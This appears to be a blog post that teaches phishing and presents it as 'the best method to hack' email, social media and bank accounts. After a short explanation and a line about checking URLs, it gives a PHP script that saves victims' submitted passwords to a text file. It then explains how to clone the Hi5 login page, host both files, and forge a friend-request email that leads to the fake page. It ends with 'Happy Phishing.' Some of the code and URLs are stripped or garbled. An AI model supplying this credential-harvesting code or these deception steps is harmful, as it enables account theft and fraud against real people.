Phishing The Art of Hacking....

What is phishing ?
Phishing is a technique of obtaining sensitive data such username,password,credit card details etc by an attacker by claiming to be a trusted or genuine organisation/company. 
The most common type of phishing is Fake Login Pages. The basic methodology of this attack is written below

1.Suppose an attacker wants to hack gmail/yahoo/facebook/bank account of the victim. Attacker creates a fake login page of that website . This fake login page looks exactly like real/genuine login page.

2.Attacker then sends the link of that fake login page to victim through an email or any other means.The sender's email Id is usually spoofed to give an authentic look to it. 
3. Victim clicks on the link, fake login page appears in his browser and he enters his credentials in that page thinking that it is genuine.
4.The credentials that are username and password go to the attacker. Hence victim's account gets hacked.
5.Victim is then redirected to any webpage as chosen by attacker. Most probably the victim is redirected
to genuine website or a page displaying an error.

I hope the idea is clear to you. This is the best method to hack anyone's gmail/yahoo/orkut/facebook/bank account.Creating a fake login page is very simple. Then it depends on attacker's smartness that how he manages to fool the victim to get his credentials entered in fake login page. Simply this attack depends on attacker's intelligence as well as victim's carelessness.

Countermeasuers :
The obvious countermeasure is that just dont blindly enter your sensitive data in a webpage that exactly looks likea genuine/real page. Carefully check the URL .But URLs can also be spoofed. The protocol must be hopefully https(secure) instead of http. If you still have doubts, you should check the digital certificate of the website.
Phishing Tutorial

Creating a fake login page and some social engineering trick's.

1.) First part:Creating the Fake Login Page.

In this part of the tutorial I'm going to tell you have to make a fake login page.
This method works for most of the pages but i have chosen Hi5 as an example.

Part 1:

First we create a PHP script that will save the passwords in a text file.

1.) Open notepad and put this code:

header ('Location: ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($ handle, "\r\n");
fclose($handle) ;

2.)Now save this as phish.php

header ('Location: ');

This URL is where the victim is redirected after logging in to you fake page.
The best way to do this is to go to the original site(in this case hi5) and try to login without username and password.Of course then the site will tell you that the username/password incorrect.Now copy that url and paste in that part of the phish.php script.As you can see the hi5 has got ""

Now we have succesfully created the script that will save the password in a text file which will be later used to see logged victim password's.

Part 2:

Now we go to and right click / View Source.
Now we need to find the place where LOGIN button in Hi5 page send the user after clicking on it.
To do that we search for something like:

In this case we have:
action="/friend/login. do"

We replace that part with:

Then we copy the whole source and save this file as login.php.

Now upload these 2 files(login.php and phish.php) to a webhost that supports PHP and you ready to go.Just give your victim the link to your Login.php file and every time they login that php script will create a file titled passwords.txt in the same directory as login.php and phish.php.Just open the password.txt and you will see the passwords.

The phishing link should be something like this: php ---> Send this to your victim

And the txt file with the passwords like this:

http://something.awa...m/passwords.txt ---> View the passwords with this one.
1.) Second part:Deceiving the Victim.

Now in this part we are going to see how we can deceive our victims.The way i do it is like this.

1#.Go to your inbox and find a simple hi5 Friend Request.Copy it like in the picture:

2#.Go to , scroll down for a little and paste the invitation like this:

*Now select the "Accept Friend" line.
*Click the hyperlink button.
*Paste your phishing link there.
*Click OK button.
See the pic for more:


Now fill in the fields like this :

Subject: Someone has sent you a hi5 Friend Request

Then enter the security code and click send.The e-mail will look like it came from hi5 just that it will redirect the victim to your phishing link instead of

The same can be done for facebook and many more websites of your choice.

NOTE:There is a chance that the email wont be sent sometimes.So the best it would be to send it on your own inbox just before you send it to your victim.

Well that's it for today boys and girls.I know it was a long tutorial but believe me it will worth it once you mastered .Let me know what you think.

Happy Phishing.


Post a Comment